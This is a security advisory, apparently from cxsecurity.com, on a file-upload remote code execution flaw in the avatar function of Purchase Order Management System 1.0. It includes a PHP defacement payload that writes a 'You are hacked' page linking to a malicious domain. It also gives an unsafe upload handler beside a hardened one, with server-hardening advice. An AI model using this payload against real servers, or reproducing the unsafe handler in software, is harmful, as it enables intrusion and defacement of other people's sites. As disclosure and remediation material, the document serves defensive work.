Purchase-Order-Management-System-1.0 File-Upload-RCE

2023.12.14
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Title: Purchase-Order-Management-System-1.0 File-Upload-RCE
## Author: nu11secur1ty
## Date: 12/14/2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-103796
## Reference: https://portswigger.net/web-security/file-upload

## Description:
The parameter custom-file-label in the avatar function is vulnerable to a File Upload vulnerability. The function does not sanitize the uploaded file correctly, so an attacker can upload a file with any extension to the system and afterwards execute it directly on the server by requesting it with curl, a web browser, etc.!

STATUS: HIGH-CRITICAL Vulnerability

[+] Exploit:

```php
<?php
// @nu11secur1ty 2023
// Payload uploaded through the avatar function as a .php file; when it is
// requested on the server it writes hacked.html next to itself.
$myfile = fopen("hacked.html", "w") or die("Unable to open file!");
$txt = "<p>You are hacked</p>\n";
fwrite($myfile, $txt);
$txt = "<p><p>This is not good for you</p>\n<a href='https://sell.sawbrokers.com/domain/malicious.com/' target='_blank'>You can visit our website for more information!</a></p>\n";
fwrite($myfile, $txt);
fclose($myfile);
?>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-System-1.0/Purchase-Order-Management-System-1.0-File-Upload-RCE)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/12/purchase-order-management-system-10_11.html)

## Time spent: 00:05:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
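The root cause the advisory describes is an avatar handler that trusts the client-supplied file name and extension and stores the result in a web-served directory. The following is an added example, not code from the Purchase Order Management System project or from the advisory's author: a PHP upload handler that shows the unsafe pattern beside a hardened one. The form field name `avatar`, the function names and the `private_uploads` directory are assumptions chosen for illustration.

```php
<?php
// Added example (not the project's own code). Contrasts the unsafe
// "trust the client's file name" pattern with a hardened avatar upload.
declare(strict_types=1);

// Unsafe pattern: the extension comes straight from $_FILES['avatar']['name'],
// so a file ending in .php lands in a web-served directory and is executed
// by the server as soon as it is requested.
function save_avatar_unsafe(array $file, string $uploadDir): string
{
    $dest = rtrim($uploadDir, '/') . '/' . basename($file['name']);
    move_uploaded_file($file['tmp_name'], $dest);
    return $dest;
}

// Hardened pattern: ignore the client name entirely, decide the type from
// the file bytes, allowlist image types only, and store under a random
// server-chosen name outside the document root.
function save_avatar_safe(array $file, string $uploadDir, int $maxBytes = 2000000): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > $maxBytes) {
        throw new RuntimeException('file too large');
    }
    // Rejects paths that did not come from this request's multipart body.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Content-sniffed MIME type, never $file['type'] (client controlled).
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($file['tmp_name']);
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('unsupported image type: ' . $mime);
    }
    // Second check: the bytes must actually decode as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('file is not a valid image');
    }

    // Random name with the extension derived from the detected type.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // readable by the web server, never executable
    return $name;       // only this server-generated name goes into the user record
}

// Endpoint usage (field name "avatar" and the directory are assumptions).
// private_uploads sits outside the document root; a separate download
// script streams the file back with a Content-Type taken from the stored
// extension, so nothing in that directory is ever interpreted by PHP.
if (isset($_FILES['avatar'])) {
    try {
        $stored = save_avatar_safe($_FILES['avatar'], __DIR__ . '/../private_uploads');
        echo 'stored as ' . htmlspecialchars($stored);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . htmlspecialchars($e->getMessage());
    }
}
```

Two defence-in-depth points matter even with the hardened handler: the upload directory should have script execution disabled at the web-server level (for Apache, a `php_flag engine off` or `RemoveHandler` directive; for nginx, no `fastcgi_pass` location covering it), and the check for a valid image should not be the only barrier, because image files can carry arbitrary trailing data. Deriving the stored extension from the sniffed type rather than the client name is what closes the vector the advisory describes.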


Copyright 2024, cxsecurity.com